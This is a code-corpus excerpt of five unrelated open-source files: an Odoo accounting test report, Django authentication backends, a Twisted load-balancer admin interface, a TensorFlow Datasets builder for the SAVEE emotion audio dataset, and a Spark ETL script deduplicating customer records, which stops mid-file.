rs.is_truncated
gpl-2.0
leorochael/odoo
addons/account_test/report/account_test_report.py
27
3861
# -*- encoding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>). All Rights Reserved # $Id$ # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## import datetime import time from openerp.osv import osv from openerp.tools.translate import _ from openerp.report import report_sxw from openerp.tools.safe_eval import safe_eval as eval # # Use period and Journal for selection or resources # class report_assert_account(report_sxw.rml_parse): def __init__(self, cr, uid, name, context): super(report_assert_account, self).__init__(cr, uid, name, context=context) self.localcontext.update( { 'time': time, 'datetime': datetime, 'execute_code': self.execute_code, }) def execute_code(self, code_exec): def reconciled_inv(): """ returns the list of invoices that are set as reconciled = True """ return self.pool.get('account.invoice').search(self.cr, self.uid, [('reconciled','=',True)]) def order_columns(item, cols=None): """ This function is used to display a dictionary as a string, with its columns in the order chosen. 
:param item: dict :param cols: list of field names :returns: a list of tuples (fieldname: value) in a similar way that would dict.items() do except that the returned values are following the order given by cols :rtype: [(key, value)] """ if cols is None: cols = item.keys() return [(col, item.get(col)) for col in cols if col in item.keys()] localdict = { 'cr': self.cr, 'uid': self.uid, 'reconciled_inv': reconciled_inv, #specific function used in different tests 'result': None, #used to store the result of the test 'column_order': None, #used to choose the display order of columns (in case you are returning a list of dict) '_': _, #used for translation } eval(code_exec, localdict, mode="exec", nocopy=True) result = localdict['result'] column_order = localdict.get('column_order', None) if not isinstance(result, (tuple, list, set)): result = [result] if not result: result = [_('The test was passed successfully')] else: def _format(item): if isinstance(item, dict): return ', '.join(["%s: %s" % (tup[0], tup[1]) for tup in order_columns(item, column_order)]) else: return item result = [_(_format(rec)) for rec in result] return result class report_accounttest(osv.AbstractModel): _name = 'report.account_test.report_accounttest' _inherit = 'report.abstract_report' _template = 'account_test.report_accounttest' _wrapped_report_class = report_assert_account # vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
agpl-3.0
ataylor32/django
django/contrib/auth/backends.py
468
6114
from __future__ import unicode_literals from django.contrib.auth import get_user_model from django.contrib.auth.models import Permission class ModelBackend(object): """ Authenticates against settings.AUTH_USER_MODEL. """ def authenticate(self, username=None, password=None, **kwargs): UserModel = get_user_model() if username is None: username = kwargs.get(UserModel.USERNAME_FIELD) try: user = UserModel._default_manager.get_by_natural_key(username) if user.check_password(password): return user except UserModel.DoesNotExist: # Run the default password hasher once to reduce the timing # difference between an existing and a non-existing user (#20760). UserModel().set_password(password) def _get_user_permissions(self, user_obj): return user_obj.user_permissions.all() def _get_group_permissions(self, user_obj): user_groups_field = get_user_model()._meta.get_field('groups') user_groups_query = 'group__%s' % user_groups_field.related_query_name() return Permission.objects.filter(**{user_groups_query: user_obj}) def _get_permissions(self, user_obj, obj, from_name): """ Returns the permissions of `user_obj` from `from_name`. `from_name` can be either "group" or "user" to return permissions from `_get_group_permissions` or `_get_user_permissions` respectively. """ if not user_obj.is_active or user_obj.is_anonymous() or obj is not None: return set() perm_cache_name = '_%s_perm_cache' % from_name if not hasattr(user_obj, perm_cache_name): if user_obj.is_superuser: perms = Permission.objects.all() else: perms = getattr(self, '_get_%s_permissions' % from_name)(user_obj) perms = perms.values_list('content_type__app_label', 'codename').order_by() setattr(user_obj, perm_cache_name, set("%s.%s" % (ct, name) for ct, name in perms)) return getattr(user_obj, perm_cache_name) def get_user_permissions(self, user_obj, obj=None): """ Returns a set of permission strings the user `user_obj` has from their `user_permissions`. 
""" return self._get_permissions(user_obj, obj, 'user') def get_group_permissions(self, user_obj, obj=None): """ Returns a set of permission strings the user `user_obj` has from the groups they belong. """ return self._get_permissions(user_obj, obj, 'group') def get_all_permissions(self, user_obj, obj=None): if not user_obj.is_active or user_obj.is_anonymous() or obj is not None: return set() if not hasattr(user_obj, '_perm_cache'): user_obj._perm_cache = self.get_user_permissions(user_obj) user_obj._perm_cache.update(self.get_group_permissions(user_obj)) return user_obj._perm_cache def has_perm(self, user_obj, perm, obj=None): if not user_obj.is_active: return False return perm in self.get_all_permissions(user_obj, obj) def has_module_perms(self, user_obj, app_label): """ Returns True if user_obj has any permissions in the given app_label. """ if not user_obj.is_active: return False for perm in self.get_all_permissions(user_obj): if perm[:perm.index('.')] == app_label: return True return False def get_user(self, user_id): UserModel = get_user_model() try: return UserModel._default_manager.get(pk=user_id) except UserModel.DoesNotExist: return None class RemoteUserBackend(ModelBackend): """ This backend is to be used in conjunction with the ``RemoteUserMiddleware`` found in the middleware module of this package, and is used when the server is handling authentication outside of Django. By default, the ``authenticate`` method creates ``User`` objects for usernames that don't already exist in the database. Subclasses can disable this behavior by setting the ``create_unknown_user`` attribute to ``False``. """ # Create a User object if not already in the database? create_unknown_user = True def authenticate(self, remote_user): """ The username passed as ``remote_user`` is considered trusted. This method simply returns the ``User`` object with the given username, creating a new ``User`` object if ``create_unknown_user`` is ``True``. 
Returns None if ``create_unknown_user`` is ``False`` and a ``User`` object with the given username is not found in the database. """ if not remote_user: return user = None username = self.clean_username(remote_user) UserModel = get_user_model() # Note that this could be accomplished in one try-except clause, but # instead we use get_or_create when creating unknown users since it has # built-in safeguards for multiple threads. if self.create_unknown_user: user, created = UserModel._default_manager.get_or_create(**{ UserModel.USERNAME_FIELD: username }) if created: user = self.configure_user(user) else: try: user = UserModel._default_manager.get_by_natural_key(username) except UserModel.DoesNotExist: pass return user def clean_username(self, username): """ Performs any cleaning on the "username" prior to using it to get or create the user object. Returns the cleaned username. By default, returns the username unchanged. """ return username def configure_user(self, user): """ Configures a user after creation and returns the updated user. By default, returns the user unmodified. """ return user
bsd-3-clause
CuonDeveloper/cuon
cuon_server/LoadBalancer/build/lib/txlb/admin/pages.py
6
13370
import time import urllib import socket from xml.dom import minidom from twisted.web import http from twisted.web import static from twisted.web import resource import txlb from txlb import util from txlb.admin import css from txlb.admin import template class UnauthorizedResource(resource.Resource): """ The page resource to present when a restricted resource is requested, thus prompting the user with a basic auth dialog. """ isLeaf = 1 unauthorizedPage = static.Data(template.unauth, 'text/html') def render(self, request): request.setResponseCode(http.UNAUTHORIZED) request.setHeader( 'WWW-authenticate', 'basic realm="PyDirector"') return self.unauthorizedPage.render(request) class StyleSheet(resource.Resource): """ The resource that serves the CSS. """ def render_GET(self, request): """ """ return css.adminCSS class BasePage(resource.Resource): """ All resources that render the basic look and feel of the admin UI subclass this page class. """ def __init__(self, parent): resource.Resource.__init__(self) self.parent = parent def getHeader(self, refreshURL='', msg=''): """ """ refresh = '' if refreshURL: refresh = template.refresh % ( self.parent.conf.admin.refresh, refreshURL) if msg: msg = template.message % msg return template.header % ( txlb.name, refresh, txlb.name, self.parent.serverVersion, socket.gethostname()) + msg def getBody(self): """ Subclasses must override this. """ raise NotImplemented def getFooter(self, message=''): """ """ if message: message = template.message % urllib.unquote(message) return template.footer % (txlb.projectURL, txlb.name, message) def getPage(self, request): """ Subclasses must override this. """ raise NotImplemented def render_GET(self, request): """ """ return str(self.getPage(request)) def isReadOnly(self): """ This check needs to be run before any form submission is processed. """ if self.parent.director.isReadOnly: msg = "The load balancer is currently in read-only mode." 
request.redirect('/all?resultMessage=%s' % urllib.quote(msg)) return True return False class RunningPage(BasePage): """ This class is responsible for presenting the admin UI, in all of it's data and button-pushing glory. """ def getPage(self, request): """ Don't look at me; this craziness is a modified version of the original. """ verbose = False resultMessage = '' content = '' msg = '' if request.args.has_key('resultMessage'): msg = request.args['resultMessage'][0] if request.args.has_key('refresh'): refresh = bool(request.args['refresh'][0]) url = '/all?refresh=1&ignore=%s' % time.time() content += self.getHeader(refreshURL=url, msg=msg) stopStart = template.stopRefresh % time.time() else: content += self.getHeader(msg=msg) stopStart = template.startRefresh % time.time() content += template.refreshButtons % ( time.ctime(time.time()), time.time(), stopStart) for service in self.parent.conf.getServices(): content += template.serviceName % service.name for index, l in enumerate(service.listen): proxy = self.parent.director.getProxy(service.name, index) hostPort = "%s:%s" % (proxy.host, proxy.port) content += template.listeningService % hostPort eg = service.getEnabledGroup() groups = service.getGroups() for group in groups: tracker = self.parent.director.getTracker( service.name, group.name) stats = tracker.getStats() hdict = tracker.getHostNames() if group is eg: klass = 'enabled' desc = template.groupDescEnabled else: klass = 'inactive' desc = template.groupDescDisabled % ( service.name, group.name) content += template.groupName % (klass, group.name) content += desc content += template.groupHeaderForm % ( service.name, group.name, klass) counts = stats['openconns'] failed = stats['failed'] totals = stats['totals'] k = counts.keys() k.sort() for h in k: f = 0 if failed.has_key(h): f = failed[h] if counts.has_key(h): oc = counts[h] else: oc = '--' if totals.has_key(h): tc = totals[h] else: tc = '--' content += template.hostInfo % ( klass, hdict[h], h, oc, tc, f, 
urllib.quote(service.name), urllib.quote(group.name), urllib.quote(h)) bad = stats['bad'] if bad: content += template.badHostGroup % klass for k in bad.keys(): host = '%s:%s' % k when, what = bad[k] content += template.badHostInfo % ( klass, hdict[host], host, what.getErrorMessage()) content += template.serviceClose content += self.getFooter(resultMessage) return content class RunningConfig(BasePage): """ This class renders the in-memory configuration as XML. """ def getPage(self, request): """ """ request.setHeader('Content-type', 'text/plain') return util.reprNestedObjects(self.parent.conf) class StoredConfig(BasePage): """ This page renders the on-disk XML configuration file. """ def getPage(self, request): """ """ request.setHeader('Content-type', 'text/plain') return self.parent.conf.dom.toxml() class DeleteHost(BasePage): """ This page is responsible for removing a host from rotation in the admin UI. It also updates the tracker and pulls the host out of rotation there as well. """ def getPage(self, request): """ """ request.setHeader('Content-type', 'text/html') if self.isReadOnly(): return "OK" service = request.args['service'][0] group = request.args['group'][0] ip = request.args['ip'][0] tracker = self.parent.director.getTracker( serviceName=service, groupName=group) service = self.parent.conf.getService(service) eg = service.getEnabledGroup() if group == eg.name: if tracker.delHost(ip=ip, activegroup=1): msg = 'host %s deleted (from active group!)' % ip else: msg = 'host %s <b>not</b> deleted from active group' % ip else: if tracker.delHost(ip=ip): msg = 'host %s deleted from inactive group' % ip else: msg = 'host %s <b>not</b> deleted from inactive group' % ip request.redirect('/all?resultMessage=%s' % urllib.quote(msg)) return "OK" class AddHost(BasePage): """ This page class is responsible for handling the "add page" action that puts new hosts into rotation, both in the admin UI as well as in the host tracking object. 
""" def getPage(self, request): request.setHeader('Content-type', 'text/html') if self.isReadOnly(): return "OK" serviceName = request.args['service'][0] groupName = request.args['group'][0] name = request.args['name'][0] ip = request.args['ip'][0] self.parent.editor.addHost(serviceName, groupName, name, ip) msg = 'Host %s(%s) added to %s / %s' % ( name, ip, groupName, serviceName) request.redirect('/all?resultMessage=%s' % urllib.quote(msg)) return "OK" class EnableGroup(BasePage): """ This page is responsible for enabling a different host group for a given service in the web UI. """ def getPage(self, request): """ """ request.setHeader('Content-type', 'text/html') if self.isReadOnly(): return "OK" serviceName = request.args['service'][0] newGroupName = request.args['group'][0] service = self.parent.director.getService(serviceName) oldGroupName = service.getEnabledGroup().name self.parent.editor.switchGroup(serviceName, oldGroupName, newGroupName) msg = "Group '%s' has been enabled." % newGroupName request.redirect('/all?resultMessage=%s' % urllib.quote(msg)) return "OK" def protect(method): """ A decorator for use by Editor methods that need to support atomic-ish operations. """ def decorator(self, *args, **kwds): self.begin() result = method(self, *args, **kwds) self.finish() return result return decorator class Editor(object): """ An object whose sole purpose is to collect all methods that change data into a single class. This is done in an effort to improve maintainability of data-changing code and to provide a unified, chohesive process whereby data edits are performed. """ def __init__(self, conf, director): self.conf = conf self.director = director def begin(self): self.director.setReadOnly() print "Set to read-only mode." def finish(self): self.director.setReadWrite() print "Set to read-write mode." 
def addHost(self, serviceName, groupName, name, ip, weight=1): """ This method adds a host to the tracker and model (director call) as well as the configuration data. """ self.director.addHost(serviceName, groupName, name, ip, weight) group = self.conf.getService(serviceName).getGroup(groupName) group.addHost(name, ip, weight) addHost = protect(addHost) def delHost(self, serviceName, groupName, name, ip): """ This method removes a host from the tracker and model (director call) as well as the configuration data. """ self.director.delHost(serviceName, groupName, name, ip) group = self.conf.getService(serviceName).getGroup(groupName) group.delHost(name) delHost = protect(delHost) def switchGroup(self, serviceName, oldGroupName, newGroupName): """ This method changes the current/active group for a given service. """ # update the configuration info serviceConf = self.conf.getService(serviceName) serviceConf.setEnabledGroup(newGroupName) # update the tracker and model info self.director.switchGroup(serviceName, oldGroupName, newGroupName) switchGroup = protect(switchGroup) class AdminServer(resource.Resource): """ The admin server page is the root web object that publishes all the other resources. 
""" def __init__(self, conf, director): resource.Resource.__init__(self) self.conf = conf self.director = director self.editor = Editor(conf, director) self.starttime = time.time() self.serverVersion = "%s/%s" % (txlb.shortName, txlb.version) def unauthorized(self): return UnauthorizedResource() def authenticateUser(self, request): # XXX this needs to be replaced with a guard/cred authstr = request.getHeader('Authorization') if not authstr: return False type, auth = authstr.split() if type.lower() != 'basic': return False auth = auth.decode('base64') user, pw = auth.split(':',1) userObj = self.conf.admin.getUser(user) if (userObj and userObj.checkPW(pw)): return True return False def getChild(self, name, request): """ A simple object publisher that mapes part of a URL path to an object. """ if not self.authenticateUser(request): return self.unauthorized() if name == 'all' or name == '': page = RunningPage(self) return page elif name == 'txlb.css': return StyleSheet() elif name == 'config.obj': return RunningConfig(self) elif name == 'config.xml': return StoredConfig(self) elif name == 'delHost': return DeleteHost(self) elif name == 'addHost': return AddHost(self) elif name == 'enableGroup': return EnableGroup(self) return resource.Resource.getChild(self, name, request)
gpl-3.0
tensorflow/datasets
tensorflow_datasets/audio/savee.py
1
7125
# coding=utf-8
# Copyright 2021 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""SAVEE dataset."""

import collections
import os
import re

import numpy as np
import tensorflow.compat.v2 as tf
import tensorflow_datasets.public_api as tfds

# Maps the emotion abbreviation that prefixes each wav file name (e.g.
# 'sa01.wav') to the full class label exposed by the dataset.
LABEL_MAP = {
    'a': 'anger',
    'd': 'disgust',
    'f': 'fear',
    'h': 'happiness',
    'n': 'neutral',
    'sa': 'sadness',
    'su': 'surprise',
}

# The four (male) speaker IDs present in the SAVEE corpus; each speaker's
# recordings live in a folder of the same name inside AudioData.zip.
SPEAKERS = ['DC', 'JE', 'JK', 'KL']

_CITATION = """
@inproceedings{Vlasenko_combiningframe,
author = {Vlasenko, Bogdan and Schuller, Bjorn and Wendemuth, Andreas and Rigoll, Gerhard},
year = {2007},
month = {01},
pages = {2249-2252},
title = {Combining frame and turn-level information for robust recognition of emotions within speech},
journal = {Proceedings of Interspeech}
}
"""

_DESCRIPTION = """
SAVEE (Surrey Audio-Visual Expressed Emotion) is an emotion recognition
dataset. It consists of recordings from 4 male actors in 7 different emotions,
480 British English utterances in total. The sentences were chosen from the
standard TIMIT corpus and phonetically-balanced for each emotion.
This release contains only the audio stream from the original audio-visual
recording.
The data is split so that the training set consists of 2 speakers, and both
the validation and test set consists of samples from 1 speaker, respectively.
"""


def _compute_split_boundaries(split_probs, n_items):
  """Computes boundary indices for each of the splits in split_probs.

  Args:
    split_probs: List of (split_name, prob), e.g. [('train', 0.6), ('dev',
      0.2), ('test', 0.2)]
    n_items: Number of items we want to split.

  Returns:
    The item indices of boundaries between different splits. For the above
    example and n_items=100, these will be
    [('train', 0, 60), ('dev', 60, 80), ('test', 80, 100)].

  Raises:
    ValueError: If there are fewer items than splits, or if the probabilities
      do not sum to 1.
  """
  if len(split_probs) > n_items:
    raise ValueError('Not enough items for the splits. There are {splits} '
                     'splits while there are only {items} items'.format(
                         splits=len(split_probs), items=n_items))
  total_probs = sum(p for name, p in split_probs)
  if abs(1 - total_probs) > 1E-8:
    raise ValueError('Probs should sum up to 1. probs={}'.format(split_probs))
  split_boundaries = []
  sum_p = 0.0
  for name, p in split_probs:
    prev = sum_p
    sum_p += p
    # Boundaries are computed on the cumulative probability so that the
    # produced ranges are contiguous and non-overlapping.
    split_boundaries.append((name, int(prev * n_items), int(sum_p * n_items)))

  # Guard against rounding errors: force the last split to end at n_items.
  split_boundaries[-1] = (split_boundaries[-1][0], split_boundaries[-1][1],
                          n_items)
  return split_boundaries


def _get_inter_splits_by_group(items_and_groups, split_probs, split_number):
  """Split items to train/dev/test, so all items in a group go into one split.

  Each group contains all the samples from the same speaker ID. The samples
  are split so that each speaker belongs to exactly one split.

  Args:
    items_and_groups: Sequence of (item_id, group_id) pairs.
    split_probs: List of (split_name, prob), e.g. [('train', 0.6), ('dev',
      0.2), ('test', 0.2)]
    split_number: Generated splits should change with split_number.

  Returns:
    Dictionary that looks like {split name -> set(ids)}.
  """
  # Sorting before shuffling makes the result deterministic for a given
  # split_number regardless of the input ordering.
  groups = sorted(set(group_id for item_id, group_id in items_and_groups))
  rng = np.random.RandomState(split_number)
  rng.shuffle(groups)

  split_boundaries = _compute_split_boundaries(split_probs, len(groups))
  group_id_to_split = {}
  for split_name, i_start, i_end in split_boundaries:
    for i in range(i_start, i_end):
      group_id_to_split[groups[i]] = split_name

  split_to_ids = collections.defaultdict(set)
  for item_id, group_id in items_and_groups:
    split = group_id_to_split[group_id]
    split_to_ids[split].add(item_id)

  return split_to_ids


class Savee(tfds.core.GeneratorBasedBuilder):
  """The audio part of SAVEE dataset for emotion recognition."""

  VERSION = tfds.core.Version('1.0.0')

  MANUAL_DOWNLOAD_INSTRUCTIONS = """\
  manual_dir should contain the file AudioData.zip. This file should be under
  Data/Zip/AudioData.zip in the dataset folder provided upon registration.
  You need to register at
  http://personal.ee.surrey.ac.uk/Personal/P.Jackson/SAVEE/Register.html in
  order to get the link to download the dataset.
  """

  def _info(self):
    """Returns the dataset metadata (features, supervised keys, citation)."""
    return tfds.core.DatasetInfo(
        builder=self,
        description=_DESCRIPTION,
        features=tfds.features.FeaturesDict({
            'audio': tfds.features.Audio(file_format='wav', sample_rate=44100),
            'label': tfds.features.ClassLabel(names=list(LABEL_MAP.values())),
            'speaker_id': tf.string
        }),
        supervised_keys=('audio', 'label'),
        homepage='http://kahlan.eps.surrey.ac.uk/savee/',
        citation=_CITATION,
    )

  def _split_generators(self, dl_manager):
    """Returns SplitGenerators."""
    zip_path = os.path.join(dl_manager.manual_dir, 'AudioData.zip')
    if not tf.io.gfile.exists(zip_path):
      raise AssertionError(
          'SAVEE requires manual download of the data. Please download '
          'the audio data and place it into: {}'.format(zip_path))

    # Need to extract instead of reading directly from archive since reading
    # audio files from zip archive is not supported.
    extract_path = dl_manager.extract(zip_path)

    items_and_groups = []
    for fname in tf.io.gfile.glob('{}/AudioData/*/*.wav'.format(extract_path)):
      # The parent folder name is the speaker ID (one of SPEAKERS).
      folder, _ = os.path.split(fname)
      _, speaker_id = os.path.split(folder)
      items_and_groups.append((fname, speaker_id))

    split_probs = [('train', 0.6), ('validation', 0.2), ('test', 0.2)]
    splits = _get_inter_splits_by_group(items_and_groups, split_probs, 0)

    return [
        tfds.core.SplitGenerator(
            name=tfds.Split.TRAIN,
            gen_kwargs={'file_names': splits['train']},
        ),
        tfds.core.SplitGenerator(
            name=tfds.Split.VALIDATION,
            gen_kwargs={'file_names': splits['validation']},
        ),
        tfds.core.SplitGenerator(
            name=tfds.Split.TEST,
            gen_kwargs={'file_names': splits['test']},
        ),
    ]

  def _generate_examples(self, file_names):
    """Yields (key, example) pairs, one per wav file."""
    for fname in file_names:
      folder, wavname = os.path.split(fname)
      _, speaker_id = os.path.split(folder)
      # The leading letters of the file name encode the emotion ('a', 'sa',
      # 'su', ...); see LABEL_MAP.
      label_abbrev = re.match('^([a-zA-Z]+)', wavname).group(1)  # pytype: disable=attribute-error
      label = LABEL_MAP[label_abbrev]
      key = '{}_{}'.format(speaker_id, wavname.split('.')[0])
      yield key, {'audio': fname, 'label': label, 'speaker_id': speaker_id}
apache-2.0
cysuncn/python
spark/crm/PROC_F_CI_SUN_IND_INFO_TMP.py
1
6787
#coding=UTF-8
# Spark ETL job: builds the temporary table F_CI_SUN_IND_INFO_TMP from
# F_CI_SUN_IND_INFO, keeping one row per (CERTTYPE, CERTID, FULLNAME, FR_ID)
# group (the one with the maximum CUSTOMERID) and writing the result as a
# date-stamped parquet file on HDFS.
#
# Command-line arguments:
#   argv[1] - ETL date (YYYYMMDD)
#   argv[2] - Spark master URL
#   argv[3] - HDFS base path
#   argv[4] - database name (used for cleanup of the previous day's output)
#   argv[5] - optional: "hive" to use a HiveContext instead of SQLContext
from pyspark import SparkContext, SparkConf, SQLContext, Row, HiveContext
from pyspark.sql.types import *
from datetime import date, datetime, timedelta
import sys, re, os

st = datetime.now()
conf = SparkConf().setAppName('PROC_F_CI_SUN_IND_INFO_TMP').setMaster(sys.argv[2])
sc = SparkContext(conf = conf)
sc.setLogLevel('WARN')
if len(sys.argv) > 5:
    if sys.argv[5] == "hive":
        sqlContext = HiveContext(sc)
    else:
        sqlContext = SQLContext(sc)
# NOTE(review): when fewer than 6 arguments are passed, sqlContext is never
# assigned and the job fails later with a NameError — presumably callers
# always pass the 6th argument; confirm against the job scheduler.
hdfs = sys.argv[3]
dbname = sys.argv[4]

# Dates used during processing
etl_date = sys.argv[1]
# ETL date
V_DT = etl_date
# previous day
V_DT_LD = (date(int(etl_date[0:4]), int(etl_date[4:6]), int(etl_date[6:8])) + timedelta(-1)).strftime("%Y%m%d")
# first day of the current month
V_DT_FMD = date(int(etl_date[0:4]), int(etl_date[4:6]), 1).strftime("%Y%m%d")
# last day of the previous month
V_DT_LMD = (date(int(etl_date[0:4]), int(etl_date[4:6]), 1) + timedelta(-1)).strftime("%Y%m%d")
# 10-character date (YYYY-MM-DD)
V_DT10 = (date(int(etl_date[0:4]), int(etl_date[4:6]), int(etl_date[6:8]))).strftime("%Y-%m-%d")


V_STEP = 0

F_CI_SUN_IND_INFO = sqlContext.read.parquet(hdfs+'/F_CI_SUN_IND_INFO/*')
F_CI_SUN_IND_INFO.registerTempTable("F_CI_SUN_IND_INFO")

# Task [21] 001-01::
V_STEP = V_STEP + 1

# Deduplicating select: the inner query picks MAX(CUSTOMERID) per
# (CERTTYPE, CERTID, FULLNAME, FR_ID) group; the join keeps only that row.
# Most columns are emitted as empty-string placeholders cast to the target
# schema types.
sql = """
 SELECT CAST(F.CUSTOMERID AS VARCHAR(32)) AS CUSTOMERID 
       ,CAST(F.FULLNAME AS VARCHAR(32)) AS FULLNAME 
       ,CAST(F.CERTTYPE AS VARCHAR(10)) AS CERTTYPE 
       ,CAST(F.CERTID AS VARCHAR(18)) AS CERTID 
       ,CAST('' AS VARCHAR(4)) AS SEX 
       ,CAST('' AS VARCHAR(10)) AS BIRTHDAY 
       ,CAST(F.NATIVEPLACE AS VARCHAR(200)) AS NATIVEPLACE 
       ,CAST('' AS VARCHAR(4)) AS MYBANKDORM 
       ,CAST('' AS VARCHAR(4)) AS STAFF 
       ,CAST('' AS VARCHAR(4)) AS ISREALTIVEMAN 
       ,CAST('' AS VARCHAR(18)) AS NATIONALITY 
       ,CAST('' AS VARCHAR(18)) AS POLITICALFACE 
       ,CAST('' AS VARCHAR(18)) AS MARRIAGE 
       ,CAST('' AS VARCHAR(4)) AS HEALTH 
       ,CAST('' AS VARCHAR(18)) AS EDUEXPERIENCE 
       ,CAST('' AS VARCHAR(18)) AS EDUDEGREE 
       ,CAST('' AS VARCHAR(80)) AS WORKCORP 
       ,CAST('' AS VARCHAR(18)) AS HEADSHIP 
       ,CAST('' AS VARCHAR(18)) AS POSITION 
       ,CAST('' AS DECIMAL(10)) AS FAMILYAMOUNT 
       ,CAST('' AS VARCHAR(200)) AS TEAMNAME 
       ,CAST('' AS VARCHAR(250)) AS REMARK2 
       ,CAST('' AS VARCHAR(250)) AS REMARK3 
       ,CAST('' AS VARCHAR(18)) AS CREDITFARMER 
       ,CAST('' AS VARCHAR(250)) AS REMARK4 
       ,CAST('' AS VARCHAR(18)) AS FAMILYSTATUS 
       ,CAST(F.FAMILYADD AS VARCHAR(200)) AS FAMILYADD 
       ,CAST('' AS VARCHAR(32)) AS FAMILYZIP 
       ,CAST('' AS VARCHAR(40)) AS FAMILYTEL 
       ,CAST('' AS VARCHAR(32)) AS MOBILETELEPHONE 
       ,CAST('' AS VARCHAR(80)) AS EMAILADD 
       ,CAST('' AS VARCHAR(18)) AS OCCUPATION 
       ,CAST('' AS VARCHAR(4)) AS DELAYCREDIT 
       ,CAST('' AS VARCHAR(18)) AS DELAYCREDITREASON 
       ,CAST('' AS VARCHAR(50)) AS FARMERCARD 
       ,CAST('' AS VARCHAR(32)) AS MYBALANCEACCOUNT 
       ,CAST('' AS VARCHAR(40)) AS MARKUP 
       ,CAST('' AS DECIMAL(10)) AS FAMILYMONTHINCOME 
       ,CAST('' AS VARCHAR(200)) AS MAINPROORINCOME 
       ,CAST('' AS VARCHAR(18)) AS CREDITLEVEL 
       ,CAST('' AS VARCHAR(10)) AS EVALUATEDATE 
       ,CAST(F.REMARK AS VARCHAR(250)) AS REMARK 
       ,CAST('' AS VARCHAR(10)) AS INPUTUSERID 
       ,CAST('' AS VARCHAR(12)) AS INPUTORGID 
       ,CAST('' AS VARCHAR(10)) AS INPUTDATE 
       ,CAST('' AS VARCHAR(10)) AS UPDATEDATE 
       ,CAST('' AS VARCHAR(10)) AS UPDATEUSERID 
       ,CAST('' AS VARCHAR(12)) AS UPDATEORGID 
       ,CAST(F.FARMILYID AS VARCHAR(20)) AS FARMILYID 
       ,CAST('' AS VARCHAR(4)) AS FAMILYROLE 
       ,CAST('' AS VARCHAR(4)) AS ISHZ 
       ,CAST('' AS DECIMAL(24,6)) AS WORKINGCAPITAL 
       ,CAST('' AS DECIMAL(24,6)) AS CAPITALASSETS 
       ,CAST('' AS DECIMAL(24,6)) AS FAMILYAVERAGEINCOME 
       ,CAST('' AS DECIMAL(24,6)) AS FAMILYALLINCOME 
       ,CAST('' AS DECIMAL(24,6)) AS FAMILYALLOUT 
       ,CAST('' AS DECIMAL(24,6)) AS FAMILYPUREINCOME 
       ,CAST('' AS DECIMAL(24,6)) AS TOTALASSETS 
       ,CAST('' AS DECIMAL(24,7)) AS TOTALINDEBTEDNESS 
       ,CAST('' AS DECIMAL(24,6)) AS FAMILYPUREASSET 
       ,CAST('' AS DECIMAL(24,6)) AS LANDSIZE 
       ,CAST('' AS VARCHAR(80)) AS LANDNO 
       ,CAST('' AS DECIMAL(24,8)) AS YEAROUTCOME 
       ,CAST('' AS VARCHAR(80)) AS BUSINESSADDRESS 
       ,CAST('' AS VARCHAR(81)) AS ALLGUARANTYADDRESS 
       ,CAST('' AS VARCHAR(20)) AS ALLGUARANTYTEL 
       ,CAST('' AS VARCHAR(10)) AS CREDITDATE 
       ,CAST('' AS INTEGER) AS INFRINGEMENTTIMES 
       ,CAST('' AS DECIMAL(24,6)) AS AVERAGEDEPOSIT 
       ,CAST('' AS VARCHAR(20)) AS PROJECTNO 
       ,CAST('' AS DECIMAL(24,6)) AS MAINPROSCOPE 
       ,CAST('' AS VARCHAR(10)) AS MANAGEUSERID 
       ,CAST('' AS VARCHAR(12)) AS MANAGEORGID 
       ,CAST('' AS DECIMAL(24,6)) AS ORDERDEPOSIT 
       ,CAST('' AS VARCHAR(4)) AS MHOUSESTRUCTURE 
       ,CAST('' AS INTEGER) AS MHOUSENO 
       ,CAST('' AS DECIMAL(24,6)) AS ACTUALEVALUATE 
       ,CAST('' AS VARCHAR(4)) AS OHOUSESTRUCTURE 
       ,CAST('' AS INTEGER) AS OHOUSENO 
       ,CAST('' AS DECIMAL(24,6)) AS OACTUALEVALUATE 
       ,CAST('' AS VARCHAR(40)) AS MACHINENAME 
       ,CAST('' AS DECIMAL(24,6)) AS MACHINEVALUE 
       ,CAST('' AS DECIMAL(24,6)) AS OTHERASSET 
       ,CAST('' AS VARCHAR(80)) AS HOUSEAREANAME 
       ,CAST('' AS VARCHAR(40)) AS HOUSEID 
       ,CAST(F.HOUSEAREANO AS DECIMAL(24,6)) AS HOUSEAREANO 
       ,CAST('' AS VARCHAR(20)) AS CUSTOMERTYPE 
       ,CAST('' AS DECIMAL(24,6)) AS YEARLNCOME 
       ,CAST(F.FR_ID AS VARCHAR(32)) AS CORPORATEORGID 
       ,CAST('' AS VARCHAR(18)) AS TEMPSAVEFLAG 
       ,CAST('' AS VARCHAR(32)) AS TEAMNO 
       ,CAST(F.VILLAGENO AS VARCHAR(32)) AS VILLAGENO 
       ,CAST('' AS VARCHAR(2)) AS LOCKORNOT 
       ,CAST('' AS VARCHAR(2)) AS ISUSINGCREDIT 
       ,CAST('' AS VARCHAR(32)) AS XDCUSTOMERID 
       ,CAST(V_DT AS VARCHAR(10)) AS ODS_ST_DATE 
       ,CAST('' AS VARCHAR(5)) AS ODS_SYS_ID 
   FROM F_CI_SUN_IND_INFO F 
   JOIN (SELECT MAX(CUSTOMERID) CUSTOMERID,FR_ID FROM F_CI_SUN_IND_INFO GROUP BY CERTTYPE,CERTID,FULLNAME,FR_ID ) C 
     ON C.CUSTOMERID=F.CUSTOMERID AND C.FR_ID = F.FR_ID """

# Substitute the literal token V_DT in the SQL text with the quoted
# 10-character ETL date before execution.
sql = re.sub(r"\bV_DT\b", "'"+V_DT10+"'", sql)
F_CI_SUN_IND_INFO_TMP = sqlContext.sql(sql)
